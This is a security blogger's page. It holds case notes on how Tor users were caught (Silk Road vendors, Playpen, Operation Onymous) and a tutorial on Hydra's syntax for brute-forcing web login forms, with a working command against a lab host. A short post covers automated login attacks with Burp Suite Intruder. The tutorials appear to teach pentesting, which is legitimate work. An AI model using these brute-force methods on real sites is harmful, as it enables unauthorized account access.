Tuesday, August 16, 2016

How Tor Users Got Caught Part 2 Cliff Notes

The following is just my notes for my video, How Tor Users Got Caught Part 2.

In the video I go over a handful of cases and explain what happened. The vast majority of cases are human error, telling someone or selling drugs via the postal service however there are other cases where users have been de-anonymized via operations like Operation Onymous where malicious relays were set up and through other attacks users IP addresses and servers were discovered. The last case goes over the investigation process that police follow to discover someone. It is a good example of how well you need to cover your tracks because it only takes one piece of evidence to unravel everything.

Unknown 14 year old: https://www.deepdotweb.com/2016/06/09/dark-net-bomb-threats-shut-florida-high-school-one-minor-arrested/

The 14-year-old boy was identified through investigations, by talking to students, teachers, and other to hone in on the boy. A warrant was issued for the boy’s phone and investigators discovered that the boy had been surfing dark net.

“This student was so sophisticated with his knowledge that the phone he was sing is what we call jail broken, which means it may look like a normal phone but if you put a certain password in, there is a completely different operating system. That is where he was able to secure services from the dark web. You can buy anything from bazookas to bomb threats. Other illegal activity occurs on that off the grid website,” investigators said.

Jacob Theodore George IV, a major early heroin vendor known as “digitalink” on Silk Road, was arrested in January 2012, after his packages had been repeatedly intercepted for at least the previous six months. George knew about the interceptions, but he bragged online about how he had sweet talked his way out of any problems. Some buyers were unconvinced—more than one called him an idiot and predicted his imminent arrest—but digitalink kept shipping heroin and a handful of other drugs out to customers until the cops knocked down his door. It is not clear from George's plea agreement how or exactly when authorities located him, but he granted investigators access to emails, shipping records and financial statements related to his business, according to the document.

BRIAN RICHARD FARRELL, 27, who used the moniker “DoctorClu”
FARRELL was one of the small staff of online administrators and forum moderators who assisted Blake Benthall with the day-to-day operation of the website. Benthall and this small staff controlled and oversaw all aspects of Silk Road 2.0, including, among other things: the computer infrastructure and programming code underlying the website; the terms of service and commission rates imposed on vendors and customers of the website; and the massive profits generated from the operation of the illegal business. FARRELL, operating under the moniker “DoctorClu,” was involved in activities such as approving new staff and vendors for the website, and organizing a denial of service attack on a competitor. When a search warrant was served at FARRELL’s Bellevue home, agents seized $35,000 in cash as well as silver bullion and various types of drug paraphernalia.

“As one of the key masterminds and coordinator of the Silk Road criminal marketplace, Farrell profited from the destruction of untold lives,” said Brad Bench, Special Agent in Charge of HSI Seattle. “Criminals who operate digital black markets and those who trade their illicit goods on them quite mistakenly believe they are above the law. It is one of HSI’s top priorities to shut down these hidden websites and bring their criminal operators and customers to justice.”


According to the complaint, when federal agents asked Farrell if he could help them identify other top people who at been involved with Silk Road 2.0, Farrell told them “You're not going to find much of a bigger fish than me.”

The US has charged Farrell with one count of conspiracy to distribute cocaine, heroine, and methamphetamine.

Special Agent Michael Larson described how the feds found Farrell in a deposition:
Between January 2014 and July 2014, a source of information provided law enforcement with particular IP addresses that had accessed the vendor portion of SR2 [Silk Road 2.0]. A user could not accidentally end up on the vendor portion of SR2. Rather, SR2 administrators/moderators restricted access to the vendor portion of the site to vendors who had conducted a certain amount of transactions. In addition, a user required a username and password to access the vendor portion of SR2.

At the end of July, Homeland Security Investigations in Seattle received a lead on one of the IP addresses and pulled Comcast records to find that the IP address matched the address of one of the investigators' cooperating witnesses. The cooperating witness (abbreviated as CW1 in the complaint) was roommates with Farrell, and said “that he/she had learned about the Silk Road and the 'dark net' from FARRELL,” adding that he was a “computer wizard” and maintained a server in the garage. Farrell also “obsessively” tracked his packages online and “babysat” the mailbox according to CW1's information.

The roommate also provided the feds with a box of Xanax pills that had been addressed to Farrell. On January 2, 2015, agents served a search warrant on Farrell's residence, and confiscated “various computer media, various prescription medications, drug paraphernalia, silver bullion bars valued at $3,900, and approximately $35,000 dollars.

an FBI Source of Information (SOI) provided “reliable IP addresses for TOR and hidden services such as Silk Road 2.” There were pretty many places included, such as the main marketplace, the vendor section, the SR2 forum and the support interface.

The information that has been provided by the institute to the feds led to the location of the Silk Road 2 servers, which helped in the identification of “at least another seventeen black markets on TOR”, which refers to Operation Onymous where law enforcement authorities in several different countries took down dark net marketplaces and scam sites on the dark web in a synchronized operation. 

However, that’s not all the info, the warrant goes by this:
“The SOI also identified approximately 78 IP addresses that accessed a vendor .onion address,” it says, referring to the users of Silk Road 2.0.

When Farell’s case was held in the court, the defense made this statement:
“On October 12, 2015, the government provided defense counsel a letter indicating that Mr. Farrell’s involvement with Silk Road 2.0 was identified based on information obtained by a ‘university-based research institute’ that operated its own computers on the anonymous network used by Silk Road 2.0.”

The defense also asked for more evidence on the academic institute that anonymously provided information to the FBI. After that, the defense made this statement:
“To date, the government has declined to produce any additional discovery.”

There’s no proof to the case, rather just a speculation, however, there might be a chance that the group of relays that were trying to deanonymize Tor users were set up by the same university. The relays have joined at January 30 and were removed by the Tor Project at July 4. This interval was the same when the unnamed SOI provided info to the bureau. Nick Mathewson, the co-founder of the Tor Project made this statement regarding the case:

“If you’re doing an experiment without the knowledge or consent of the people you’re experimenting on, you might be doing something questionable—and if you’re doing it without their informed consent because you know they wouldn’t give it to you, then you’re almost certainly doing something wrong. Whatever you’re doing, it isn’t science.”

Farell wasn’t the only one who had to appear before court for different charges that came from the mysterious SOI. Gabriel Peterson-Siler, who’s hearing was held at November 1, was charged with the possession of child pornography. In June 2014, the same time interval Farrell’s IP address was provided to the FBI, an investigation into Peterson-Siler shown an IP address that belonged to the man. After his house was searched in September 2014, he was charged for possession of child pornography in April of this year, and pleaded not guilty to all charges. Peterson-Siler’s defense requested the same information and evidence on the source that provided the IP address that led to the man’s bust.

It is not confirmed, though, but there’s a big chance that the SOI academic institute was the Carnegie Mellon University, where researchers have been paid at least $1 million by the FBI. The Tor Project published this in a blog post:

“Civil liberties are under attack if law enforcement believes it can circumvent the rules of evidence by outsourcing police work to universities. If academia uses “research” as a stalking horse for privacy invasion, the entire enterprise of security research will fall into disrepute. Legitimate privacy researchers study many online systems, including social networks — If this kind of FBI attack by university proxy is accepted, no one will have meaningful 4th Amendment protections online and everyone is at risk.”

On 5 November 2014, as the final piece of Operation Onymous, the operator of Silk Road 2, Blake Benthall / “Defcon” was arrested in San Francisco (press release; complaint). It is highly likely that the undercover agent Cirrus had enabled the locating of the SR2 server, which Benthall apparently had rented under his own name (possibly at his employer Close’s hosting), after which his Bitcoin spending (on a Tesla) was noted and surveillance correlated Defcon’s activities with Benthall’s; after being arrested, he “did admit to everything”.

On 6 November 2014, David & Teri Schell were arrested in California for selling marijuana and marijuana wax (complaint,PACER); additional coverage indicated they were investigated after “discovering an Internet Protocol address was accessing the Silk Road 2.0 site” and then PO box surveillance nailed them. The DoctorClu case reveals that the seller portal for SR2 had been used to de-anonymize a few IPs (but not many), implying that an undercover agent (presumably Cirrus) had inserted a de-anonymization exploit similar to the previous Freedom Hosting exploit. They were probably the SR1 & SR2 seller “CaliforniaCanibas” (profile).

Richard Armendariz worked as a U.S. Customs and Border Protection analyst for 42 years. Two days ago a federal judge denied Richards bond at a hearing. Armendariz,69, was arrested as part of a massive investigation into child pornography on dark net. Dark net is only accessible with the use of Tor, a browser that allows you to view normal websites anonymously; but also lets you access websites normal browsers can’t.

Armendariz, as testimonies have revealed, is related to former Texas Appellate judge Albert Armendariz Sr.; who died in 2007. Sr. was a former civil rights leader; and founder of the Mexican American Legal Defense and Educational Fund. Armendariz Sr. was also a federal immigration judge.  During the time Richard Armendariz Sr. worked for the agency he was stationed in Miami, Florida; and in Colombia. He also had top-secret clearance.

When Richard retired five years ago he moved back to San Antonio, Texas where his two sons live. He was one of 215,000 people the FBI has connected to a website it seized that made child porn available on the Dark net. This is just one of the many arrests going to be made is the FBI takeover of Playpen. The FBIs investigation consisted of them infecting the site with malware, gaining control of Playpen, running it on their servers for two weeks in order to trace the websites users.
“There is a part of him that is completely unknown to his family. This man has had a demonstrated sexual interest in prepubescent children for 36 years,” Assistant U.S. Attorney Tracy Thompson told U.S. Magistrate Judge John Primomo during Tuesdays hearing.

At the hearing there was also a woman who alleged Armendariz molested her in El Paso. The woman said the molestations happened from the time she was 11 years old, until she was in high school. She stated that she was 20 when she finally told her parents what Armendariz was doing to her.
“It changed everything in my life. It made it difficult to have healthy sexual relationships. I was acting out. Trust is a big issue…a lot of destructive behavior,” the woman said in court. The woman’s father confronted Armendariz in the late 80’s and the alleged molestations stopped. He was never charged with anything.

Jeff Baker, an FBI Special agent told the court that their Playpen investigation targeted Armendariz specifically in in the beginning of May, 2015. It wasn’t until September that FBI agents raided his home and confiscated his laptop and computer equipment. Baker also testified that “Playpen was the largest child porn ring in existence on the Tor network.”
Armendariz testified he had been searching, and viewing child pornography via the encrypted Tor network for three years. Armendariz’ attorney also told the Magistrate “Armendariz favorite section was toddlers. Some of it involved horrible sexual abuse; some of it is described as mutilation.”
With more than 117,000 posts and an average of 11,000 unique visitors a week, Playpen has been proven to be one of the biggest on Tor. The Investigation was kept a secret until November by news reports in a San Antonio newspaper about three local men being charged in connection with the investigation. It’s still unclear how many of the 1,300 people identified by their IP addresses have been arrested.

Jeff Baker spend quite a few years investigating child abuse and exploitation cases. He also testified that the content of Playpen was some of the worst child abuse material he had ever seen and it included images and video of children of all ages being raped, and tortured. Items confiscated from Armendariz’s home contained 800 images and 140 videos of child pornography to varying degrees.
Armendariz defense attorney argued that he was forthcoming with the FBI during the September raid on his home and admitted to being in possession of child pornography. Defense attorney Davis also argued that her client is not a danger to the community because there was no evidence that Armendariz had any kind of sexual interaction with children other than 30-year-old accusations. Magistrate Primomo agreed that Armendariz was not a flight risk, but believes he is a danger to the community.

“I’ve known Baker for a long time, and for him to say this is the worst that he has ever seen leaves a strong impression in my mind.” Primomo said. “The evidence of the molestation is uncontested. There is no indication of remorse. There is no indication of any apologies,”. The judge went on to say that he couldn’t risk the possibility that Richard Armendariz would act out sexually with children if he we to release him on bond.

OPSEC Fail: Ex-Judge Arrested In Online Impersonation Case
Online impersonation is a crime in Texas, which is what former Judge Christoper Dupuy is being charged two counts of. In a case similar to that ofPreston Alexander McWaters’, the 43 year old also has problems with handling rejection from women.

You see, Dupuy had known a woman – let’s call her Jane – for 20 years and had dated her for 6 years until she ended the relationship in August 2014 and decided to marry someone else. That marriage didn’t work out and Jane got a divorce. She had Dupuy represent her in the divorce proceedings in which he at one point asked her if they could be in a relationship together again. Jane declined and he was angered by this.

Dupuy began aggressively stalking her on Facebook and making comments about other men she interacted with, he also saved pictures and sent them to her with derogatory remarks. Jane put up with this until her divorce was finalized in November 2014 and cut off all contact and ignored him. She told the investigating officer, Scott Hardcastle, that Dupuy had been harassing her ever since they broke up in August 2014.

In December 2014, he graduated from Facebook harassment to something more sinister. Jane began receiving several phone calls and text messages. Finally answering one the calls, she found out that she was on backpage.com purporting to be a prostitute. The advert stated she charged $70 an hour. Jane told the Deputy she contacted that she isn’t a prostitute, didn’t post the advert, and didn’t give anyone permission to post the advert. She told the Deputy that she suspects that Dupuy was behind this.

Hardcastle interviewed Jane in January 2015 where she told him what she told the Deputy. He then researched into Dupuy’s life and found out that he was a Judge. Six days later, he sent a subpoena to backpage.com and learned the user name, email address, home address, IP address, and credit card number of the account that posted the advert. The home address used was Jane’s and the account was associated with numerous IP addresses.

Apparently, the account made two adverts for the same person – Jane. One advert used a picture that Jane took while she was dating Dupuy and only sent to one person – Dupuy.
Hardcastle looked into the credit card number and using a BIN checker, he found that it was Visa credit card. After contacting Visa, he was redirected to GreenDot who told them it was gift card and wasn’t registered to anyone so they were of no help.

After that dead end, Hardcastle turned his attention toward the IP addresses. is an IP address in Germany connected to the provider 23Media and is an IP address in Venezuela connected to the provider Roya Hosting. He quickly determined that these IP addresses were VPNs.

When the Venezuelan national police cyber-crimes unit was contacted, they told Hardcastle that “resolves to the state owned telephone and internet company C’Amv” and that “that this hosting service is designed to conceal the true location of the user and that there would be no further way to discover the identity of the user”.

Germany was of no help either because when Hardcastle reached out to Homeland Security to assist him, they told him that weren’t able to trace the identity “due to the fact that Germany only retains IP Address logs for seven days”.

Hardcastle never determined which VPN service the IP addresses belonged to but the hosting providers have been associated with a few, including HideMyAss.  The Houston Press reports that Dupuy used HideMyAss but Hardcastle’s affidavit never states this.

And so, Hardcastle looked into the user name of the backpage account, “Don Tequila”. He determined that it was a false alias and was associated with a Facebook page that makes negative comments about Dupuy and hates him. Hardcastle moved onto the next piece of information associated with the backpage account – the email address, dontequila1900@hotmail.com.
A subpoena was issued to MSN Hotmail on late February 2015 and they responded with the requested information on May 2015. The name listed on the email address was Don Tequila and it was registered using a VPN IP address in Germany.

However, a history of IP addresses associated with the email address was given as well. One of those IP addresses being: located in League City, Texas provided by Comcast. Four days later, a subpoena to Comcast was sent and – surprise, surprise – the records show that the subscriber for that IP address is Christoper Dupuy.

A search warrant was executed on June 2015 for Dupuy’s residence, and when his door was kicked in, he was found in the kitchen. When asked to put his hands up, a bullet fell from his hand. Hardcastle asked for the gun and Dupuy complied and told him where it was. He found a 9mm pistol.
While Dupuy’s residence was searched, a bag was found in his bathroom hidden between the toilet and bathtub. 

Dupuy was charged with two counts of online impersonation and his bail was set at $600,000 but was later reduced to $400,000.

Robot Arrested: http://www.cnbc.com/2015/04/21/robot-with-100-bitcoin-buys-drugs-gets-arrested.html

Teenager Arrested for Trying To Buy Glock Pistol From The Dark Web
Megan Schadeberg (19), from Carmarthenshire, had attempted to buy a Glock handgun from the dark web and said she wanted to ”kill herself and kill the world” according to the court. During the house search, police found books on mass shootings where the girl made notes. They also found a diary where Schadeberg said that she “hated everyone” and “did not feeling anything for other people”.
On the 19-year-old’s iPhone, the law enforcement authorities found the link of a dark net marketplace where Schadeberg put a Glock G21 and ammunition for it in a shopping basket and uploaded £240 in Bitcoins to a wallet, which she could use for a down payment for the weapon and the bullets.
Schadeberg pleaded guilty to the attempt of buying a prohibited weapon in October last year when she appeared in the dock of Swansea Crown Court last week. According to official court documents, her plan to buy a gun came to light after she told a psychiatrist about it who then alerted police.
The court also heard that Schadeberg was suffering from “some form of psychotic illness”. According to Craig Jones, from defense, the girl’s actions had been “a cry for help”.
Judge Paul Thomas QC described the case as “terribly sad and also very worrying” and he made a hospital order detaining the teenager so she could be treated.


Introducing human error
In 2011, the Dark Net’s first drug markets opened up for business.

Silk Road, Black Market Reloaded, and the Farmer’s Market transformed the illicit goods industry within months of migrating to the anonymous Tor network. While the markets flourished quickly, the arrests actually began quietly the same year that Silk Road started.

An as-yet-unnamed confidential source gave federal investigators a crash course in how Silk Road worked in November 2011. He also gave them access to a vendor’s account, as well as the names and addresses of Silk Road customers around the world.
In 2012, the arrests became more prominent.

Over the next two years, dozens of dealers and customers were arrested for drug operations on the Dark Net. The cause wasn’t Tor itself—the most obvious common denominator—it was human error.
George’s shipments, and those by others like him, were caught and flagged while they were being mailed. Many had poor “stealth” for their packages, making them easily detected by postal workers and drug dogs.

Even some of Silk Road’s biggest operations have been brought down via the postal service. Deep Web heroin kingpin Steven Lloyd Sadler and his partner-in-crime girlfriend, Jenna White, sold heroin, cocaine, and meth by the bundle on the Dark Net, shipping high-quality product at premium prices to earn over $105,000 per month. But White was flagged by postal workers after she parked in front of security cameras at post offices, bought masses of stamps at once, and visited often enough to be identified as the woman with handwriting identical to those found on intercepted packages containing heroin.

Dark Net drug dealers don’t just make mistakes in the regular mail. They also make them in email.
In April 2012, the Farmer’s Market (TFM) was shuttered and its administrators arrested after a two-year investigation by the Drug Enforcement Agency.

TFM, which had been operating for at least six years online, had only recently made the move to Tor in order to improve security. TFM’s owners also used Hushmail, a Canadian operation that advertises itself as powerfully encrypted private email. The problem was that Hushmail itself could decrypt the emails, so when police subpoenaed the company, every single email was an open book for law enforcement.

When Silk Road fell in 2013, the arrests of dozens of Tor users for drug offenses were made public all at once. Many wondered, in the wake of Edward Snowden’s NSA leaks, if the program itself was broken.

Even today, months after Ross Ulbricht was sentenced to life in prison, there are still many unanswered questions about his arrest. The FBI claims that the black market accidently gave up its location due to trivial but profound mistakes made by Ulbricht when he configured Tor for the hidden service he operated. Critics among the information security community, however, believe the FBI hacked in by attacking Silk Road with unexpected commands and forcing the server to mistakenly give up its location.

The speculation surrounding the specifics of Silk Road’s fall have persisted even through Ulbricht’s surprisingly fast trial in February 2015.

In almost all the cases we know about, it’s trivial mistakes that tend to unintentionally expose Tor users.

Several top Silk Road administrators were arrested because they gave proof of identity to Dread Pirate Roberts, data that was owned by the police when Ulbricht was arrested. Giving your identity away, even to a trusted confidant, is always huge mistake.

A major meth dealer’s operation was discovered after the IRS started investigating him for unpaid taxes, and an OBGYN who allegedly sold prescription pills used the same username on Silk Road that she did on eBay.

Likewise, the September 2014 arrest of a pedophile could be traced to his use of “gateway sites” (such as Tor2Web), which allow users to access the Deep Web but, contrary to popular belief, do not offer the anonymizing power of Tor.

“There’s not a magic way to trace people [through Tor], so we typically capitalize on human error, looking for whatever clues people leave in their wake,” James Kilpatrick, a Homeland Security Investigations agent, told the Wall Street Journal.

Tor isn’t perfect. It’s an ambitious piece of open-source software run off of grants and donations that is constantly under scrutiny from all corners. The regular security updates and constant work that goes into the product prove that there is still work to be done.

Tor’s greatest Achilles’ heel, however, remains its users.

When Tor users are arrested, “it usually does not involve the core technology being cracked or being hacked in any way,” Nik Cubrilovic, an Australian cybersecurity consultant, told Politico. “It’s usually something else.”

Hackers with a badge
On the morning of Aug. 3, 2013, every site hosted by Freedom Hosting crashed.
Freedom Hosting was the most popular hosting service on the Deep Web, described by the FBI as the “largest facilitator of child porn on the planet.” It was even the target of attacks from groups like the hacker collective Anonymous.

The fall of Freedom Hosting—a case that is still in its early stages—is one of the big question marks in Tor history. The case has moved slowly due to its international nature, and police have revealed precious little about how they found Freedom Hosting and arrested its alleged owner, Irishman Eric Eoin Marques.

- See more at: http://kernelmag.dailydot.com/issue-sections/features-issue-sections/13606/tor-arrest-history/#sthash.EzDhoRU1.dpuf

Huge List:

On 26 September 2014, the 21yo South Australia man Ryan James Norman was arrested while picking up a package from the post office after Customs intercepted a shipment of ~5000 doses of 25i-NBOMe from Canada; he was sentenced in September 2015 to 3.5 years. It later emerged that he was a seller on SR2; I have identified Norman as the SR2 seller “MagicAU” based on similar products and MagicAU vanishing from SR2 during 26-28 September 2014, immediately after Norman was raided, and MagicAU’s relatively young vendor age which matches the description of Norman as having sold for ~2 months before being arrested.

During April 2015, a 40yo German man in W├╝rzburg was arrested for purchases of MDMA, cocaine, amphetamines, cannabis & “synthetic” drugs totaling kilograms off of SR2 (he does not seem to have been a SR2 seller, indicating he was a local reseller) and earlier markets starting in 2012. The investigation appears to have relied FBI forensic analysis of the seized SR2 server’s PMs (he, like many, apparently had not been using PGP in communicating with his sellers) and also German customs intercepts of several orders.

In early May 2014, the SR2 seller “Xanax King” (Jeremy Donagal) & his associates were arrested (DEA press release); he ran a very large operation with multiple employees, purchased ingredients using Western Union & wire transfers to China, “sold drugs locally, distributing Xanax tablets, GHB, and steroids”, some sort of clearnet website (xkloves.us, content removed in lieu of a now-defunct Tor hidden service), and had at least one “confidential informant” in his organization (see the anti-bail letter), who was handling their SR2 orders at the end according to a media report (some buyers reported being asked to resend their PGP-encrypted addresses).

The fall out from XK’s bust has been substantial: the anti-bail letter claims “In addition to the nine defendants in this case, evidence gathered from Defendant’s enterprise led to the arrest of nearly 60 other people throughout the country”. Several of his customers received controlled deliveries and have been arrested as well. 2 controlled deliveries on 28 May picked up 4 men in Bloomington, Indiana(Carlos Matthew Allen, David Christian Feigel, Paul Furto, & Andrew C. Dickey). Kory D. Kreider in New Orleans, Louisiana whose pickup of a package was surveilled managed to evade arrest on 29 May but was arrested a few days later using cellphone records & Facebook data. Some other CDs in late May/early June 2014 are highly likely to be XK-related. In Naperville, Illinois, Brian Patrick Noone was arrested on 30 May 2014 after a search warrant yielded 600 Xanax pills, apparently based on “a tip from a federal task force about drug trafficking in Naperville”. In Nashville, Tennessee, 3 people (Demarcus Blue, Markuite Matthews, & Adrevious Rayner) were arrested after a CD on 29 May 2014 of 5000 gel cap Xanax pills sent by a “An alleged drug ring” shipping from California and the mailer“was taken into custody at the end of last week”.
On 5 November 2014, as the final piece of Operation Onymous, the operator of Silk Road 2, Blake Benthall / “Defcon” was arrested in San Francisco (press release; complaint). It is highly likely that the undercover agent Cirrus had enabled the locating of the SR2 server, which Benthall apparently had rented under his own name (possibly at his employer Close’s hosting), after which his Bitcoin spending (on a Tesla) was noted and surveillance correlated Defcon’s activities with Benthall’s; after being arrested, he “did admit to everything”.

On 6 November 2014, David & Teri Schell were arrested in California for selling marijuana and marijuana wax (complaint,PACER); additional coverage indicated they were investigated after “discovering an Internet Protocol address was accessing the Silk Road 2.0 site” and then PO box surveillance nailed them. The DoctorClu case reveals that the seller portal for SR2 had been used to de-anonymize a few IPs (but not many), implying that an undercover agent (presumably Cirrus) had inserted a de-anonymization exploit similar to the previous Freedom Hosting exploit. They were probably the SR1 & SR2 seller “CaliforniaCanibas” (profile).

In “last fall” (Fall 2014), US Air Force cadet Nathaniel Penalosa’s dorm room was searched and a military investigation into his sale of drugs to fellow students at the USAF academy, including LSD, molly/methylenedioxy-methamphetamine, and modafinil. He had ordered them via mail from Silk Road 2 His court-martial began around August 2015, leading to the expulsion of 3 other cadets, and he accepted a plea-bargain for 3 years.

In November 2014, 37yo Louisiana man Michael Munro Jr. was arrested for importing Xanax & oxycodone bought on SR2 since March 2014.

The Washington man Brian Farrell & SR2 staffer “DoctorClu” was arrested 20 January 2015; his IP had been uncovered in July 2014 accessing the SR2 seller portal13, like CaliforniaCanibas, by CMU researchers and the information turned over to the FBI. Thelocal police investigated by post-office checks and then interviewing him & his roommate on 22 December 2014; the roommate spoke freely about Farrell’s drug use and online connections and the next day even provided some of Farrell’s drugs to the police, allowing a search warrant to search the house and uncover Farrell’s prescription drugs on 2 January 2015, at which point he confessed everything & to helping run SR2 as the employee DoctorClu and was then arrested (the charges being upgraded from local pill charges to federal conspiracy charges; complaint). He was sentenced to 8 years in June 2016.

Follow me on Twitter, @gFogerlie (https://twitter.com/gfogerlie), Google+ https://plus.google.com/+GarrettFogerlie and Facebook https://www.facebook.com/garrett.fogerlie

Subscribe: http://www.youtube.com/subscription_center?add_user=GarrettFogerlie

Have a video request? Let me know: https://www.youtube.com/user/GarrettFogerlie/discussion

Tuesday, April 12, 2016

Detailed Explanation of Hydra's Syntax for Web Form Attacks

This article will break down the syntax we used for Hydra in the article, Brute forcing a website login form using Hydra and the video Brute Force Website Login Attack Using Hydra

In general you can usually type 'man' followed by the program name to read the manual. However hydra doesn't have a manual, but just typing 'hydra' will show you the basic info or 'hydra -h' for more info. Below is the basic help. One of the best command for detailed help with a module is to use the '-U' option followed by the module name. Here are all the modules:

asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 teamspeak telnet[s] vmauthd vnc xmpp 
So here is the command I used:
hydra -l root -p 557 -v attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"

To start we have the program name, hydra followed by -l userName or -L userNameFile.txt The -l option is for a login name. Then we have the -p password or -P passwordFile.txt This is for the password or password file. The -v is optional, it stands for verbose (it is an option that most all programs have, and can come in handy to see what's happening.) Verbose just means that it will show you a lot of information that would not normally be shown (you can read more by running hydra -h )

Next we have attack.samsclass.info This is the domain name we will be attacking don't incluse the http:// or https:// and don't include anything past or including the / after the name. 

Now we have the service module to run, in this case it is http-get-form. This tells hydra that it will be attacking an http web form by making a get request (most forms use post, just FYI.) You can learn a ton more by running 'hydra -U http-get-form' Here is a quote of what it says:

The parameters take three ":" separated values, plus optional values.(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)
Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]First is the page on the server to GET or POST to (URL).Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the "^USER^" and "^PASS^" placeholders (FORM PARAMETERS)Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by "F=", successful condition login check must be preceded by "S=". This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter!

Next we have the three required parameters in quotes separated by a colin ':', "/brute4.php:login=^USER^&pin=^PASS^:Denied" So first is the URL that the form posts to, /brute4.php. Then the posted query string or options, login=^USER^&pin=^PASS^ So this is what the form submits, if you look at a form, this would be the name of any input, checkbox etc. 

Here we have 'login' and 'pin'. Hydra replaces ^USER^ with the username or usernames from the username file and it replaces ^PASS^ with the provided password or passwords from the password file. Finally we have the third required parameter, Denied this is the text to look for to know the login failed. In our case it is Denied, but this will be different for different sites. Optionally you can look for a successful login text, something that is only shown when you successfully login. You can do this with a `S=' followed by the text. An example of a successful login text may be the username, as some sites show the username once you login.

Hopefully this has helped you understand what each part of the syntax we used does. Here is the full help for the http-get-form module:
Help for module http-get-form:===========================================================================Module http-get-form requires the page and the parameters for the web form.By default this module is configured to follow a maximum of 5 redirections ina row. It always gathers a new cookie from the same URL without variablesThe parameters take three ":" separated values, plus optional values.(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]First is the page on the server to GET or POST to (URL).Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the "^USER^" and "^PASS^" placeholders (FORM PARAMETERS)Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by "F=", successful condition login check must be preceded by "S=". This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter!The following parameters are optional: C=/page/uri     to define a different page to gather initial cookies from (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request                 ^USER^ and ^PASS^ can also be put into these headers!                 Note: 'h' will add the user-defined header at the end                 regardless it's already being sent by Hydra or not.                 'H' will replace the value of that header if it exists, by the                 one supplied by the user, or add the header at the endNote that if you are going to put colons (:) in your headers you should escape them with a backslash (\). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.Examples: "/login.php:user=^USER^&pass=^PASS^:incorrect" "/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success" "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed" "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^" "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb" 

Saturday, March 12, 2016

Using Burp Suite To Attack Website Logins - Video

This video shows you how to use Burp Suite to intercept login form posts, alter them in Burp Suite's Intruder and launch an automated attack that will work against most websites. In the video we attack a website that has an Antiforgery token that is hidden in the form. This, along with a tracking cookie that is submitted with the form prevents the server from even attempting to validate the login if these tokens don't match. This will prevent tools like Hydra from effectively hacking the login.

Here is the code that is run on the server when the Login Form is Posted:

As you can see, the AntiForgeryToken is checked before the server even enters the Login Action. Therefore if this token fails, the server will never even attempt to process the login.

While this video shows a method that will work against most websites, my company designs secure web applications that can mitigate such an attack. If you are interested in learning more about the applications we design, please email Garrett Fogerlie